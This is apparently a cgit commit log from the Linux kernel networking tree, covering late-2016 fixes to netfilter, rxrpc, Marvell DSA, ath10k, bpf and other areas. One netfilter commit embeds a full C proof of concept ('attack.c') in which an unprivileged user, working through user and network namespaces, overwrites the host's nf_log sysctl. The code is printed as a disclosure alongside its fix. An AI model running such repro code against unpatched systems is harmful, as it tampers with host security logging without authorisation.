summaryrefslogtreecommitdiff
AgeCommit message (Collapse)Author
2016-10-04netfilter: nft_limit: fix divided by zero panicLiping Zhang
After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04netfilter: fix namespace handling in nf_log_proc_dostringJann Horn
nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit divisionVishwanath Pai
Division of 64bit integers will cause linker error undefined reference to `__udivdi3'. Fix this by replacing divisions with div64_64 Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...") Signed-off-by: Vishwanath Pai <vpai@akamai.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30netfilter: accommodate different kconfig in nf_set_hooks_headAaron Conole
When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle the request for registration properly by dropping the hook. This releases the entry during the set. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30netfilter: Fix potential null pointer dereferenceAaron Conole
It's possible for nf_hook_entry_head to return NULL. If two nf_unregister_net_hook calls happen simultaneously with a single hook entry in the list, both will enter the nf_hook_mutex critical section. The first will successfully delete the head, but the second will see this NULL pointer and attempt to dereference. This fix ensures that no null pointer dereference could occur when such a condition happens. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30mlx5: Add ndo_poll_controller() implementationCalvin Owens
This implements ndo_poll_controller in net_device_ops callbacks for mlx5, which is necessary to use netconsole with this driver. Acked-By: Saeed Mahameed <saeedm@mellanox.com> Signed-off-by: Calvin Owens <calvinowens@fb.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30nfp: bpf: zero extend 4 byte context loadsJakub Kicinski
Set upper 32 bits of destination register to zeros after load from the context structure. Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30mlx4: remove unused fieldsDavid Decotigny
This also can address following UBSAN warnings: [ 36.640343] ================================================================================ [ 36.648772] UBSAN: Undefined behaviour in drivers/net/ethernet/mellanox/mlx4/fw.c:857:26 [ 36.656853] shift exponent 64 is too large for 32-bit type 'int' [ 36.663348] ================================================================================ [ 36.671783] ================================================================================ [ 36.680213] UBSAN: Undefined behaviour in drivers/net/ethernet/mellanox/mlx4/fw.c:861:27 [ 36.688297] shift exponent 35 is too large for 32-bit type 'int' [ 36.694702] ================================================================================ Tested: reboot with UBSAN, no warning. Signed-off-by: David Decotigny <decot@googlers.com> Acked-by: Eric Dumazet <edumazet@google.com> Reviewed-by: Tariq Toukan <tariqt@mellanox.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30ipv6 addrconf: implement RFC7559 router solicitation backoffMaciej Żenczykowski
This implements: https://tools.ietf.org/html/rfc7559 Backoff is performed according to RFC3315 section 14: https://tools.ietf.org/html/rfc3315#section-14 We allow setting /proc/sys/net/ipv6/conf/*/router_solicitations to a negative value meaning an unlimited number of retransmits, and we make this the new default (inline with the RFC). We also add a new setting: /proc/sys/net/ipv6/conf/*/router_solicitation_max_interval defaulting to 1 hour (per RFC recommendation). Signed-off-by: Maciej Żenczykowski <maze@google.com> Acked-by: Erik Kline <ek@google.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30Merge branch 'net_proc_perf'David S. Miller
Jia He says: ==================== Reduce cache miss for snmp_fold_field In a PowerPc server with large cpu number(160), besides commit a3a773726c9f ("net: Optimize snmp stat aggregation by walking all the percpu data at once"), I watched several other snmp_fold_field callsites which would cause high cache miss rate. test source code: ================ My simple test case, which read from the procfs items endlessly: /***********************************************************/ int main(int argc, char **argv) { int i; int fd = -1 ; int rdsize = 0; char buf[LINELEN+1]; buf[LINELEN] = 0; memset(buf,0,LINELEN); if(1 >= argc) { printf("file name empty\n"); return -1; } fd = open(argv[1], O_RDWR, 0644); if(0 > fd){ printf("open error\n"); return -2; } for(i=0;i<0xffffffff;i++) { while(0 < (rdsize = read(fd,buf,LINELEN))){ //nothing here } lseek(fd, 0, SEEK_SET); } close(fd); return 0; } /**********************************************************/ compile and run: ================ gcc test.c -o test perf stat -d -e cache-misses ./test /proc/net/snmp perf stat -d -e cache-misses ./test /proc/net/snmp6 perf stat -d -e cache-misses ./test /proc/net/sctp/snmp perf stat -d -e cache-misses ./test /proc/net/xfrm_stat before the patch set: ==================== Performance counter stats for 'system wide': 355911097 cache-misses [40.08%] 2356829300 L1-dcache-loads [60.04%] 355642645 L1-dcache-load-misses # 15.09% of all L1-dcache hits [60.02%] 346544541 LLC-loads [59.97%] 389763 LLC-load-misses # 0.11% of all LL-cache hits [40.02%] 6.245162638 seconds time elapsed After the patch set: =================== Performance counter stats for 'system wide': 194992476 cache-misses [40.03%] 6718051877 L1-dcache-loads [60.07%] 194871921 L1-dcache-load-misses # 2.90% of all L1-dcache hits [60.11%] 187632232 LLC-loads [60.04%] 464466 LLC-load-misses # 0.25% of all LL-cache hits [39.89%] 6.868422769 seconds time elapsed The cache-miss rate can be reduced from 15% to 2.9% changelog ========= v6: - correct v5 v5: - order local variables from longest to shortest line v4: - move memset into one block of if statement in snmp6_seq_show_item - remove the changes in netstat_seq_show considerred the stack usage is too large v3: - introduce generic interface (suggested by Marcelo Ricardo Leitner) - use max_t instead of self defined macro (suggested by David Miller) v2: - fix bug in udplite statistics. - snmp_seq_show is split into 2 parts ==================== Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: Suppress the "Comparison to NULL could be written" warningsJia He
This is to suppress the checkpatch.pl warning "Comparison to NULL could be written". No functional changes here. Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30ipv6: Remove useless parameter in __snmp6_fill_statsdevJia He
The parameter items(is always ICMP6_MIB_MAX) is useless for __snmp6_fill_statsdev Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30proc: Reduce cache miss in xfrm_statistics_seq_showJia He
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to aggregate the data by going through all the items of each cpu sequentially. Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30proc: Reduce cache miss in sctp_snmp_seq_showJia He
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to aggregate the data by going through all the items of each cpu sequentially. Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30proc: Reduce cache miss in snmp6_seq_showJia He
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to aggregate the data by going through all the items of each cpu sequentially. Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30proc: Reduce cache miss in snmp_seq_showJia He
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to aggregate the data by going through all the items of each cpu sequentially. Then snmp_seq_show is split into 2 parts to avoid build warning "the frame size" larger than 1024. Signed-off-by: Jia He <hejianet@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net:snmp: Introduce generic interfaces for snmp_get_cpu_field{, 64}Jia He
This is to introduce the generic interfaces for snmp_get_cpu_field{,64}. It exchanges the two for-loops for collecting the percpu statistics data. This can aggregate the data by going through all the items of each cpu sequentially. Signed-off-by: Jia He <hejianet@gmail.com> Suggested-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30Merge tag 'rxrpc-rewrite-20160929' of ↵David S. Miller
git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs David Howells says: ==================== rxrpc: Fixes and adjustments This set of patches contains some fixes and adjustments: (1) Connections for exclusive calls are being reused because the check to work out whether to set RXRPC_CONN_DONT_REUSE is checking where the parameters will be copied to (but haven't yet). (2) Make Tx loss-injection go through the normal return, so the state gets set correctly for what the code thinks it has done. Note lost Tx packets in the tx_data trace rather than the skb tracepoint. (3) Activate channels according to the current state from within the channel_lock to avoid someone changing it on us. (4) Reduce the local endpoint's services list to a single pointer as we don't allow service AF_RXRPC sockets to share UDP ports with other AF_RXRPC sockets, so there can't be more than one element in the list. (5) Request more ACKs in slow-start mode to help monitor the state driving the window configuration. (6) Display the serial number of the packet being ACK'd rather than the ACK packet's own serial number in the congestion trace as this can be related to other entries in the trace. ==================== Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30Merge tag 'wireless-drivers-next-for-davem-2016-09-29' of ↵David S. Miller
git://git.kernel.org/pub/scm/linux/kernel/git/kvalo/wireless-drivers-next Kalle Valo says: wireless-drivers-next patches for 4.9 Major changes: iwlwifi * work for new hardware support continues * dynamic queue allocation stabilization * improvements in the MSIx code * multiqueue support work continues * new firmware version support (API 26) * add 8275 series support * add 9560 series support * add support for MU-MIMO sniffer * add support for RRM by scan * add support for "reverse" rx packet injection faking hw descriptors * migrate to devm memory allocation handling * Remove support for older firmwares (API older than -17 and -22) wl12xx * support booting the same rootfs with both wl12xx and wl18xx hostap * mark the driver as obsolete ath9k * disable RNG by default ==================== Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30Merge branch 'dsa-global-cosmetics'David S. Miller
Vivien Didelot says: ==================== net: dsa: mv88e6xxx: Global (1) cosmetics The Global (1) internal SMI device of Marvell switches is a set of registers providing support to different units for MAC addresses (ATU), VLANs (VTU), PHY polling (PPU), etc. Chips (like 88E6060) may use a different address for it, or have subtleties in the units (e.g. different number of databases, changing how registers must be accessed), making it hard to maintain properly. This patchset is a first step to polish the Global (1) support, with no functional changes though. Here's basically what it does: - add helpers to access Global1 registers (same for Global2) - remove a few family checks (VTU/STU FID registers) - s/mv88e6xxx_vtu_stu_entry/mv88e6xxx_vtu_entry/ - add a per-chip mv88e6xxx_ops structure of function pointers: struct mv88e6xxx_ops { int (*get_eeprom)(struct mv88e6xxx_chip *chip, struct ethtool_eeprom *eeprom, u8 *data); int (*set_eeprom)(struct mv88e6xxx_chip *chip, struct ethtool_eeprom *eeprom, u8 *data); int (*set_switch_mac)(struct mv88e6xxx_chip *chip, u8 *addr); int (*phy_read)(struct mv88e6xxx_chip *chip, int addr, int reg, u16 *val); int (*phy_write)(struct mv88e6xxx_chip *chip, int addr, int reg, u16 val); }; Future patchsets will add ATU/VTU ops, software reset, etc. ==================== Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add eeprom opsVivien Didelot
Remove EEPROM flags in favor of new {get,set}_eeprom chip-wide functions in the mv88e6xxx_ops structure. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add set_switch_mac to opsVivien Didelot
Add a set_switch_mac chip-wide function to mv88e6xxx_ops and remove MV88E6XXX_FLAG_G2_SWITCH_MAC flags. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add chip-wide opsVivien Didelot
Introduce a mv88e6xxx_ops structure to describe supported chip-wide functions and assign the correct variant to the chip models. For the moment, add only PHY access routines. This allows to get rid of the PHY ops structures and the usage of PHY flags. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: rename mv88e6xxx_opsVivien Didelot
The mv88e6xxx_ops is used to describe how to access the chip registers. It can be through SMI (via an MDIO bus), or via another interface such as crafted remote management frames. The correct BUS operations structure is chosen at runtime, depending on the chip address and connectivity. We will need the mv88e6xxx_ops name for future chip-wide operation structure, thus rename mv88e6xxx_ops to more explicit mv88e6xxx_bus_ops. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: rename mv88e6xxx_vtu_stu_entryVivien Didelot
The STU (if the switch has one) is abstracted and accessed through the VTU operations and data registers. Thus rename the mv88e6xxx_vtu_stu_entry struct to mv88e6xxx_vtu_entry. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add mv88e6xxx_num_ports helperVivien Didelot
Add an mv88e6xxx_num_ports helper instead of digging in the chip info structure. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: expose mv88e6xxx_num_databasesVivien Didelot
The mv88e6xxx_num_databases will be used by shared code, so move it inline to the header file. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add flags for FID registersVivien Didelot
Add flags to describe the presence of Global 1 ATU FID register (0x01) and VTU FID register (0x02), instead of checking families. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: abstract REG_GLOBAL2Vivien Didelot
Similarly to the ports, phys, and Global SMI devices, abstract the SMI device address of the Global 2 registers in a few g2 static helpers. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30net: dsa: mv88e6xxx: add global1 helpersVivien Didelot
The Global (1) internal SMI device is an extended set of registers containing ATU, PPU, VTU, STU, etc. It is present on every switches, usually at SMI address 0x1B. But old models such as 88E6060 access it at address 0xF, thus using REG_GLOBAL is erroneous. Add a global1_addr info member used by mv88e6xxx_g1_{read,write} and mv88e6xxx_g1_wait helpers in a new global1.c file. This patch finally removes _mv88e6xxx_reg_{read,write}, in favor on the appropriate helpers. No functional changes here. Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-29rxrpc: Note serial number being ACK'd in the congestion management traceDavid Howells
Note the serial number of the packet being ACK'd in the congestion management trace rather than the serial number of the ACK packet. Whilst the serial number of the ACK packet is useful for matching ACK packet in the output of wireshark, the serial number that the ACK is in response to is of more use in working out how different trace lines relate. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29rxrpc: Request more ACKs in slow-start modeDavid Howells
Set the request-ACK on more DATA packets whilst we're in slow start mode so that we get sufficient ACKs back to supply information to configure the window. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29rxrpc: Reduce the rxrpc_local::services list to a pointerDavid Howells
Reduce the rxrpc_local::services list to just a pointer as we don't permit multiple service endpoints to bind to a single transport endpoints (this is excluded by rxrpc_lookup_local()). The reason we don't allow this is that if you send a request to an AFS filesystem service, it will try to talk back to your cache manager on the port you sent from (this is how file change notifications are handled). To prevent someone from stealing your CM callbacks, we don't let AF_RXRPC sockets share a UDP socket if at least one of them has a service bound. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29rxrpc: When activating client conn channels, do state check inside lockDavid Howells
In rxrpc_activate_channels(), the connection cache state is checked outside of the lock, which means it can change whilst we're waking calls up, thereby changing whether or not we're allowed to wake calls up. Fix this by moving the check inside the locked region. The check to see if all the channels are currently busy can stay outside of the locked region. Whilst we're at it: (1) Split the locked section out into its own function so that we can call it from other places in a later patch. (2) Determine the mask of channels dependent on the state as we're going to add another state in a later patch that will restrict the number of simultaneous calls to 1 on a connection. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29rxrpc: Make Tx loss-injection go through normal return and adjust tracingDavid Howells
In rxrpc_send_data_packet() make the loss-injection path return through the same code as the transmission path so that the RTT determination is initiated and any future timer shuffling will be done, despite the packet having been binned. Whilst we're at it: (1) Add to the tx_data tracepoint an indication of whether or not we're retransmitting a data packet. (2) When we're deciding whether or not to request an ACK, rather than checking if we're in fast-retransmit mode check instead if we're retransmitting. (3) Don't invoke the lose_skb tracepoint when losing a Tx packet as we're not altering the sk_buff refcount nor are we just seeing it after getting it off the Tx list. (4) The rxrpc_skb_tx_lost note is then no longer used so remove it. (5) rxrpc_lose_skb() no longer needs to deal with rxrpc_skb_tx_lost. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29rxrpc: Fix exclusive client connectionsDavid Howells
Exclusive connections are currently reusable (which they shouldn't be) because rxrpc_alloc_client_connection() checks the exclusive flag in the rxrpc_connection struct before it's initialised from the function parameters. This means that the DONT_REUSE flag doesn't get set. Fix this by checking the function parameters for the exclusive flag. Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29Merge branch 'qcom-emac-acpi'David S. Miller
Timur Tabi says: ==================== Add basic ACPI support to the Qualcomm Technologies EMAC driver This patch series adds support to the EMAC driver for extracting addresses, interrupts, and some _DSDs (properties) from ACPI. The first two patches clean up the code, and the third patch adds ACPI-specific functionality. The first patch fixes a bug with handling the platform_device for the internal PHY. This phy is treated as a separate device in both DT and ACPI, but since the platform is not released automatically when the driver unloads, managed functions like devm_ioremap_resource cannot be used. The second patch replaces of_get_mac_address with its platform-independent equivalent device_get_mac_address. The third patch parses the ACPI tables to obtain the platform_device for the primary EMAC node ("QCOM8070") and the internal phy node ("QCOM8071"). ==================== Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-29net: qcom/emac: initial ACPI supportTimur Tabi
Add support for reading addresses, interrupts, and _DSD properties from ACPI tables, just like with device tree. The HID for the EMAC device itself is QCOM8070. The internal PHY is represented by a child node with a HID of QCOM8071. The EMAC also has some complex clock initialization requirements that are not represented by this patch. This will be addressed in a future patch. Signed-off-by: Timur Tabi <timur@codeaurora.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-29net: qcom/emac: use device_get_mac_addressTimur Tabi
Replace the DT-specific of_get_mac_address() function with device_get_mac_address, which works on both DT and ACPI platforms. This change makes it easier to add ACPI support. Signed-off-by: Timur Tabi <timur@codeaurora.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-29net: qcom/emac: do not use devm on internal phy pdevTimur Tabi
The platform_device returned by of_find_device_by_node() is not automatically released when the driver unprobes. Therefore, managed calls like devm_ioremap_resource() should not be used. Instead, we manually allocate the resources and then free them on driver release. Signed-off-by: Timur Tabi <timur@codeaurora.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-29bpf: allow access into map value arraysJosef Bacik
Suppose you have a map array value that is something like this struct foo { unsigned iter; int array[SOME_CONSTANT]; }; You can easily insert this into an array, but you cannot modify the contents of foo->array[] after the fact. This is because we have no way to verify we won't go off the end of the array at verification time. This patch provides a start for this work. We accomplish this by keeping track of a minimum and maximum value a register could be while we're checking the code. Then at the time we try to do an access into a MAP_VALUE we verify that the maximum offset into that region is a valid access into that memory region. So in practice, code such as this unsigned index = 0; if (foo->iter >= SOME_CONSTANT) foo->iter = index; else index = foo->iter++; foo->array[index] = bar; would be allowed, as we can verify that index will always be between 0 and SOME_CONSTANT-1. If you wish to use signed values you'll have to have an extra check to make sure the index isn't less than 0, or do something like index %= SOME_CONSTANT. Signed-off-by: Josef Bacik <jbacik@fb.com> Acked-by: Alexei Starovoitov <ast@kernel.org> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28net: do not export sk_stream_write_spaceEric Dumazet
Since commit 900f65d361d3 ("tcp: move duplicate code from tcp_v4_init_sock()/tcp_v6_init_sock()") we no longer need to export sk_stream_write_space() From: Eric Dumazet <edumazet@google.com> Cc: Neal Cardwell <ncardwell@google.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28Merge ath-next from git://git.kernel.org/pub/scm/linux/kernel/git/kvalo/ath.gitKalle Valo
ath.git patches for 4.9. Major changes: ath9k * disable RNG by default
2016-09-28tcp: Change txhash on every SYN and RTO retransmitLawrence Brakmo
The current code changes txhash (flowlables) on every retransmitted SYN/ACK, but only after the 2nd retransmitted SYN and only after tcp_retries1 RTO retransmits. With this patch: 1) txhash is changed with every SYN retransmits 2) txhash is changed with every RTO. The result is that we can start re-routing around failed (or very congested paths) as soon as possible. Otherwise application health checks may fail and the connection may be terminated before we start to change txhash. v4: Removed sysctl, txhash is changed for all RTOs v3: Removed text saying default value of sysctl is 0 (it is 100) v2: Added sysctl documentation and cleaned code Tested with packetdrill tests Signed-off-by: Lawrence Brakmo <brakmo@fb.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28MAINTAINERS: hostap: Mark the Host AP driver obsoleteJouni Malinen
This is old code for old hardware and it is not really accurate to claim this to be maintained anymore. Change the status to "Obsolete" to make it clearer that minor cleanup and other unnecessary changes from automated tools is not necessarily beneficial and has larger risk of breaking something without being quickly noticed due to lack of testing. In addition, remove the old mailing list that does not work anymore and point the web-page to a more accurate URL. Signed-off-by: Jouni Malinen <j@w1.fi> Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
2016-09-28ath6kl: fix return value in ath6kl_wmi_set_pvb_cmdChaehyun Lim
When building with W=1, we got one warning as belows: drivers/net/wireless/ath/ath6kl/wmi.c:3509:6: warning: variable ‘ret’ set but not used [-Wunused-but-set-variable] At the end of ath6kl_wmi_set_pvb_cmd, it is returned by 0 regardless of return value of ath6kl_wmi_cmd_send. This patch fixes return value from 0 to ret that has result of ath6kl_wmi_cmd_send execution. Signed-off-by: Chaehyun Lim <chaehyun.lim@gmail.com> Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
2016-09-28ath9k: disable RNG by defaultMiaoqing Pan
ath9k RNG will dominates all the noise sources from the real HW RNG, disable it by default. But we strongly recommand to enable it if the system without HW RNG, especially on embedded systems. Signed-off-by: Miaoqing Pan <miaoqing@codeaurora.org> Acked-by: Stephan Mueller <smueller@chronox.de> Acked-by: Stephan Mueller <smueller@chronox.de> Reviewed-by: Jason Cooper <jason@lakedaemon.net> Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
2016-09-28ath10k: fix copy engine 5 destination ring stuckRajkumar Manoharan
Firmware is running watchdog timer for tracking copy engine ring index and write index. Whenever both indices are stuck at same location for given duration, watchdog will be trigger to assert target. While updating copy engine destination ring write index, driver ensures that write index will not be same as read index by finding delta between these two indices (CE_RING_DELTA). HTT target to host copy engine (CE5) is special case where ring buffers will be reused and delta check is not applied while updating write index. In rare scenario, whenever CE5 ring is full, both indices will be referring same location and this is causing CE ring stuck issue as explained above. This issue is originally reported on IPQ4019 during long hour stress testing and during veriwave max clients testsuites. The same issue is also observed in other chips as well. Fix this by ensuring that write index is one less than read index which means that full ring is available for receiving data. Cc: stable@vger.kernel.org Tested-by: Tamizh chelvam <c_traja@qti.qualcomm.com> Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com> Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
2016-09-28ath10k: Ignore SWBA event for a vif if its marked for no beaconMohammed Shafi Shajakhan
Ignore processing further in SWBA event scheduled for a vif, if mac80211 has marked the particular vif for stop beaconing and brought the vdev down in 'ath10k_control_beaconing'. This should potentially avoid ath10k warning/error messages while running continuous wifi down/up with max number of vaps configured. Found this change during code walk through and going through other beacon configuration related functions in ath10k Signed-off-by: Mohammed Shafi Shajakhan <mohammed@qti.qualcomm.com> Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
2016-09-28ath10k: fix error return code in ahbWei Yongjun
Fix to return a negative error code from the error handling case instead of 0, as done elsewhere in function ath10k_ahb_probe() or ath10k_ahb_resource_init(). Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com> Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>